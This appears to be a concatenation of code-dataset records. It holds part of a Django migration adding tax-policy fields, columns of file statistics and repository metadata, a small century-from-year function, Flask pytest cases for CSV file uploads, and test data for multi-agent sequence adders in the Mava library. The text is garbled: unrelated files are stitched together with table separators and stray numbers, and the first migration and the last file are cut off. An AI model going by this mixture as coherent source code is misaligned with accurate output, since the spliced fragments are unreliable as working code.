model_name='taxsaveinputs',
name='FilerCredit_c_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_0',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_1',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_2',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_3',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_4',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_5',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_6',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_rt',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_rt_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_0',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_1',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_2',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_3',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_4',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_EligibleRate_active',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_EligibleRate_passive',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_exclusion_rt',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_exclusion_wage_limit',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_exclusion_wage_limit_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_top_stacking',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_wages_active_income',
field=models.CharField(default=b'False', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='cpi_offset',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
]
| 42.044199
| 119
| 0.619185
| 780
| 7,610
| 5.841026
| 0.098718
| 0.130378
| 0.166594
| 0.195566
| 0.942493
| 0.942493
| 0.932836
| 0.932836
| 0.927568
| 0.923837
| 0
| 0.017538
| 0.265703
| 7,610
| 180
| 120
| 42.277778
| 0.797781
| 0.00276
| 0
| 0.763006
| 0
| 0
| 0.151048
| 0.04969
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.00578
| 0.011561
| 0
| 0.028902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fc5dc1b335d1415110734d91cdd642e0fb4c934b
| 100
|
py
|
Python
|
Arcade/Intro/1_The_Journey_Begins/2_centuryFromYear/code.py
|
leocabrallce/CodeFights
|
9037c68669c04bff6b6152491ce37dbbbec62aa9
|
[
"MIT"
] | null | null | null |
Arcade/Intro/1_The_Journey_Begins/2_centuryFromYear/code.py
|
leocabrallce/CodeFights
|
9037c68669c04bff6b6152491ce37dbbbec62aa9
|
[
"MIT"
] | null | null | null |
Arcade/Intro/1_The_Journey_Begins/2_centuryFromYear/code.py
|
leocabrallce/CodeFights
|
9037c68669c04bff6b6152491ce37dbbbec62aa9
|
[
"MIT"
] | null | null | null |
def centuryFromYear(year):
return int(year / 100) if (year % 100 == 0) else int(year / 100) + 1
| 33.333333
| 72
| 0.63
| 16
| 100
| 3.9375
| 0.625
| 0.333333
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141026
| 0.22
| 100
| 2
| 73
| 50
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5d799d284c312e29a30c8a091a947b825f1b4cdf
| 7,116
|
py
|
Python
|
request_handler/tests/test_5_put.py
|
AsAsgard/trading_pr
|
d4290cf256504ffc3f15ede353e9e7dd19e1099f
|
[
"Apache-2.0"
] | 2
|
2019-05-04T08:23:28.000Z
|
2019-07-03T21:53:13.000Z
|
request_handler/tests/test_5_put.py
|
AsAsgard/trading_pr
|
d4290cf256504ffc3f15ede353e9e7dd19e1099f
|
[
"Apache-2.0"
] | 7
|
2019-05-01T12:28:17.000Z
|
2019-05-26T14:51:42.000Z
|
request_handler/tests/test_5_put.py
|
AsAsgard/trading_pr
|
d4290cf256504ffc3f15ede353e9e7dd19e1099f
|
[
"Apache-2.0"
] | 3
|
2019-05-01T14:01:36.000Z
|
2020-10-13T05:07:25.000Z
|
#!/usr/bin/env python
# coding: utf-8
import pytest
import os
from flask import url_for
from app.db_entities.data_view import Data
from app.db_entities.files_view import Files
from app.schemas.data_schema import DataSchema
from tests.t_data import testData, testFilenames, count_lines
class TestPut:
@pytest.mark.parametrize('file, values_list', [pytest.param(Files(filename=fn), testData) for fn in testFilenames])
def test_empty_request_put(self, client, db_session, file, values_list):
db_session.add(file)
db_session.commit()
assert db_session.query(Files).all() == [file]
samples = []
data_schema = DataSchema()
for values in values_list:
values['fileid'] = file.fileid
sample = data_schema.load(values, session=db_session, partial=True).data
assert isinstance(sample, Data)
samples.append(sample)
db_session.add(sample)
db_session.commit()
assert db_session.query(Data).all() == samples
assert client.put(url_for('data_handler.change_file', fileid=file.fileid)).status_code == 400
assert client.put(url_for('data_handler.change_file', fileid=file.fileid + 1)).status_code == 404
assert db_session.query(Files).all() == [file]
assert db_session.query(Data).all() == samples
@pytest.mark.parametrize('uploadedfile, filepath', [
pytest.param("request_handler/tests/csv/little_data.csv", "request_handler/tests/csv/only_title.csv"),
pytest.param("request_handler/tests/csv/little_data.csv", "request_handler/tests/csv/no_data.csv"),
pytest.param("request_handler/tests/csv/little_data.csv", "request_handler/tests/csv/image.jpg"),
])
def test_bad_body_put(self, client, db_session, uploadedfile, filepath):
post_resp = client.post(url_for('data_handler.upload_file'),
data={'file': (uploadedfile, os.path.basename(uploadedfile))})
assert post_resp.status_code == 200
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(uploadedfile) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(uploadedfile)
assert db_session.query(Data).all()
assert db_session.query(Files).all()
put_resp = client.put(url_for('data_handler.update_file', fileid=post_resp.get_json()['fileid']),
data={'file': (filepath, os.path.basename(filepath))})
assert put_resp.status_code == 400
assert db_session.query(Files).all()
assert db_session.query(Data).all()
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(uploadedfile) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(uploadedfile)
@pytest.mark.parametrize('file, values_list, filepath', [
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/little_data.csv"),
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/little_data_2.csv"),
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/medium_data.csv"),
pytest.param(Files(filename=testFilenames[0]), testData, "request_handler/tests/csv/little_data_cp1251.csv"),
])
def test_good_body_put(self, client, db_session, file, values_list, filepath):
assert client.get(url_for('data_handler.file_info', fileid=1)).status_code == 404
db_session.add(file)
db_session.commit()
assert db_session.query(Files).all() == [file]
samples = []
data_schema = DataSchema()
for values in values_list:
values['fileid'] = file.fileid
sample = data_schema.load(values, session=db_session, partial=True).data
assert isinstance(sample, Data)
samples.append(sample)
db_session.add(sample)
db_session.commit()
assert db_session.query(Data).all()
assert db_session.query(Files).all()
put_resp = client.put(url_for('data_handler.change_file', fileid=file.fileid),
data={'file': (filepath, os.path.basename(filepath))})
assert put_resp.status_code == 204
assert db_session.query(Files).all()
assert db_session.query(Data).all()
get_resp = client.get(url_for('data_handler.file_info', fileid=file.fileid))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(filepath) - 1
assert get_resp.get_json()['fileid'] == file.fileid
assert get_resp.get_json()['filename'] == os.path.basename(filepath)
@pytest.mark.parametrize('uploadedfile, filepath', [
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/little_data.csv"),
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/little_data_2.csv"),
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/medium_data.csv"),
pytest.param("request_handler/tests/csv/2_com_2_anth.csv", "request_handler/tests/csv/little_data_cp1251.csv"),
])
def test_good_intersect_put(self, client, db_session, uploadedfile, filepath):
post_resp = client.post(url_for('data_handler.upload_file'),
data={'file': (uploadedfile, os.path.basename(uploadedfile))})
assert post_resp.status_code == 200
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(uploadedfile) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(uploadedfile)
assert db_session.query(Data).all()
assert db_session.query(Files).all()
put_resp = client.put(url_for('data_handler.change_file', fileid=post_resp.get_json()['fileid']),
data={'file': (filepath, os.path.basename(filepath))})
assert put_resp.status_code == 204
assert db_session.query(Files).all()
assert db_session.query(Data).all()
get_resp = client.get(url_for('data_handler.file_info', fileid=post_resp.get_json()['fileid']))
assert get_resp.status_code == 200
assert get_resp.get_json()['data_count'] == count_lines(filepath) - 1
assert get_resp.get_json()['fileid'] == post_resp.get_json()['fileid']
assert get_resp.get_json()['filename'] == os.path.basename(filepath)
| 58.327869
| 119
| 0.676082
| 945
| 7,116
| 4.837037
| 0.103704
| 0.061037
| 0.060162
| 0.086633
| 0.913367
| 0.907241
| 0.888427
| 0.872457
| 0.85583
| 0.844454
| 0
| 0.011925
| 0.186903
| 7,116
| 121
| 120
| 58.809917
| 0.778085
| 0.004778
| 0
| 0.696429
| 0
| 0
| 0.190537
| 0.148164
| 0
| 0
| 0
| 0
| 0.419643
| 1
| 0.035714
| false
| 0
| 0.0625
| 0
| 0.107143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d7e026ba33682331bd7e21e2c30b5f1c1a53293
| 30,732
|
py
|
Python
|
tests/adders/sequence_adders_test_data.py
|
sash-a/Mava
|
976d0863e058fd92f066d8a8fabe2f5e2f3f60ce
|
[
"Apache-2.0"
] | 337
|
2021-07-06T09:09:56.000Z
|
2022-03-30T21:42:37.000Z
|
tests/adders/sequence_adders_test_data.py
|
sash-a/Mava
|
976d0863e058fd92f066d8a8fabe2f5e2f3f60ce
|
[
"Apache-2.0"
] | 125
|
2021-07-12T11:38:37.000Z
|
2022-03-30T19:22:53.000Z
|
tests/adders/sequence_adders_test_data.py
|
sash-a/Mava
|
976d0863e058fd92f066d8a8fabe2f5e2f3f60ce
|
[
"Apache-2.0"
] | 43
|
2021-07-06T19:44:37.000Z
|
2022-03-07T09:29:07.000Z
|
import dm_env
import numpy as np
from mava.adders.reverb import base
from mava.utils.wrapper_utils import parameterized_restart, parameterized_termination
# TODO Clean this up, when using newer versions of acme.
try:
from acme.adders.reverb.sequence import EndBehavior
except ImportError:
from acme.adders.reverb.sequence import EndOfEpisodeBehavior as EndBehavior
agents = {"agent_0", "agent_1", "agent_2"}
reward_step1 = {"agent_0": 0.0, "agent_1": 0.0, "agent_2": 1.0}
reward_step2 = {"agent_0": 1.0, "agent_1": 0.0, "agent_2": 0.0}
reward_step3 = {"agent_0": 0.0, "agent_1": 1.0, "agent_2": 0.0}
reward_step4 = {"agent_0": 1.0, "agent_1": 1.0, "agent_2": 1.0}
reward_step5 = {"agent_0": -1.0, "agent_1": -1.0, "agent_2": -1.0}
reward_step6 = {"agent_0": 0.5, "agent_1": -5.0, "agent_2": 1.0}
reward_step7 = {"agent_0": 1.0, "agent_1": 3.0, "agent_2": 1.0}
obs_first = {agent: np.array([0.0, 1.0]) for agent in agents}
obs_step1 = {agent: np.array([1.0, 2.0]) for agent in agents}
obs_step2 = {agent: np.array([2.0, 3.0]) for agent in agents}
obs_step3 = {agent: np.array([3.0, 4.0]) for agent in agents}
obs_step4 = {agent: np.array([4.0, 5.0]) for agent in agents}
obs_step5 = {agent: np.array([5.0, 6.0]) for agent in agents}
obs_step6 = {agent: np.array([6.0, 7.0]) for agent in agents}
obs_step7 = {agent: np.array([7.0, 8.0]) for agent in agents}
default_discount = {agent: 1.0 for agent in agents}
default_action = {agent: 0.0 for agent in agents}
env_restart = parameterized_restart(
reward={agent: 0.0 for agent in agents},
discount=default_discount,
observation=obs_first,
)
final_step_discount = {agent: 0.0 for agent in agents}
TEST_CASES = [
dict(
testcase_name="ShortEpsPeriodOne",
sequence_length=3,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step4,
observation=obs_step4,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{},
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step4,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneWithExtras",
sequence_length=3,
period=1,
first=(env_restart, {"state": -1}),
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
{"state": 0},
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
{"state": 1},
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
{"state": 2},
),
(
default_action,
parameterized_termination(
reward=reward_step4,
observation=obs_step4,
discount=final_step_discount,
),
{"state": 3},
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first,
default_action,
reward_step1,
default_discount,
True,
{"state": -1},
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
default_discount,
False,
{"state": 0},
),
base.Trajectory(
obs_step2,
default_action,
reward_step3,
default_discount,
False,
{"state": 1},
),
],
[
base.Trajectory(
obs_step1,
default_action,
reward_step2,
default_discount,
False,
{"state": 0},
),
base.Trajectory(
obs_step2,
default_action,
reward_step3,
default_discount,
False,
{"state": 1},
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{"state": 2},
),
],
[
base.Trajectory(
obs_step2,
default_action,
reward_step3,
default_discount,
False,
{"state": 1},
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{"state": 2},
),
base.Trajectory(
obs_step4,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{"state": 3},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneEarlyTermination",
sequence_length=3,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step2,
observation=obs_step2,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step2,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneEarlyTerminationWithPadding",
sequence_length=4,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step2,
observation=obs_step2,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step2,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
base.Trajectory(
{
agent: np.zeros_like(obs_step2[list(agents)[0]])
for agent in agents
},
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="ShortEpsPeriodOneEarlyTerminationNoPadding",
sequence_length=4,
period=1,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step2,
observation=obs_step2,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1,
default_action,
reward_step2,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step2,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
end_behavior=EndBehavior.TRUNCATE,
),
dict(
testcase_name="ShortEpsPeriodTwo",
sequence_length=3,
period=2,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step4,
observation=obs_step4,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3,
default_action,
reward_step4,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step4,
default_action,
{agent: 0.0 for agent in agents},
final_step_discount,
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="LongEpsPadding",
sequence_length=3,
period=3,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step4,
observation=obs_step4,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step5,
observation=obs_step5,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step6,
observation=obs_step6,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step7,
observation=obs_step7,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5, default_action, reward_step6, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step6,
default_action,
reward_step7,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step7,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
base.Trajectory(
{
agent: np.zeros_like(obs_step7[list(agents)[0]])
for agent in agents
},
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
),
dict(
testcase_name="LongEpsNoPadding",
sequence_length=3,
period=3,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step4,
observation=obs_step4,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step5,
observation=obs_step5,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step6,
observation=obs_step6,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step7,
observation=obs_step7,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5, default_action, reward_step6, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step6,
default_action,
reward_step7,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step7,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
end_behavior=EndBehavior.TRUNCATE,
),
dict(
testcase_name="LongEpsContinuePeriodTwo",
sequence_length=3,
period=2,
first=env_restart,
steps=(
(
default_action,
dm_env.transition(
reward=reward_step1,
observation=obs_step1,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step2,
observation=obs_step2,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step3,
observation=obs_step3,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step4,
observation=obs_step4,
discount=default_discount,
),
),
(
default_action,
dm_env.transition(
reward=reward_step5,
observation=obs_step5,
discount=default_discount,
),
),
(
default_action,
parameterized_termination(
reward=reward_step6,
observation=obs_step6,
discount=final_step_discount,
),
),
),
expected_sequences=(
# (observation, action, reward, discount, start_of_episode, next_extras)
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
[
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
],
[
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
],
[
base.Trajectory(
obs_first, default_action, reward_step1, default_discount, True, {}
),
base.Trajectory(
obs_step1, default_action, reward_step2, default_discount, False, {}
),
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step2, default_action, reward_step3, default_discount, False, {}
),
base.Trajectory(
obs_step3, default_action, reward_step4, default_discount, False, {}
),
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
],
[
base.Trajectory(
obs_step4, default_action, reward_step5, default_discount, False, {}
),
base.Trajectory(
obs_step5,
default_action,
reward_step6,
final_step_discount,
False,
{},
),
base.Trajectory(
obs_step6,
default_action,
{agent: 0.0 for agent in agents},
{agent: 0.0 for agent in agents},
False,
{},
),
],
),
agents=agents,
end_behavior=EndBehavior.CONTINUE,
repeat_episode_times=3,
),
]
| 32.798292
| 88
| 0.408825
| 2,162
| 30,732
| 5.513876
| 0.045791
| 0.130862
| 0.112658
| 0.09412
| 0.923161
| 0.919638
| 0.893801
| 0.884154
| 0.876688
| 0.873668
| 0
| 0.027708
| 0.517343
| 30,732
| 936
| 89
| 32.833333
| 0.775972
| 0.02281
| 0
| 0.869281
| 0
| 0
| 0.015723
| 0.005663
| 0
| 0
| 0
| 0.001068
| 0
| 1
| 0
| false
| 0
| 0.007625
| 0
| 0.007625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5deab6a285b38f24c9a56f2541b1b99e1dc8dd90
| 118
|
py
|
Python
|
simple/__init__.py
|
ilias-karimalis/SimPLe
|
69b10d7f7b884923b45dafe1a5e66c5b352f31ca
|
[
"MIT"
] | 7
|
2021-05-08T04:02:17.000Z
|
2022-03-21T10:53:02.000Z
|
simple/__init__.py
|
ilias-karimalis/SimPLe
|
69b10d7f7b884923b45dafe1a5e66c5b352f31ca
|
[
"MIT"
] | null | null | null |
simple/__init__.py
|
ilias-karimalis/SimPLe
|
69b10d7f7b884923b45dafe1a5e66c5b352f31ca
|
[
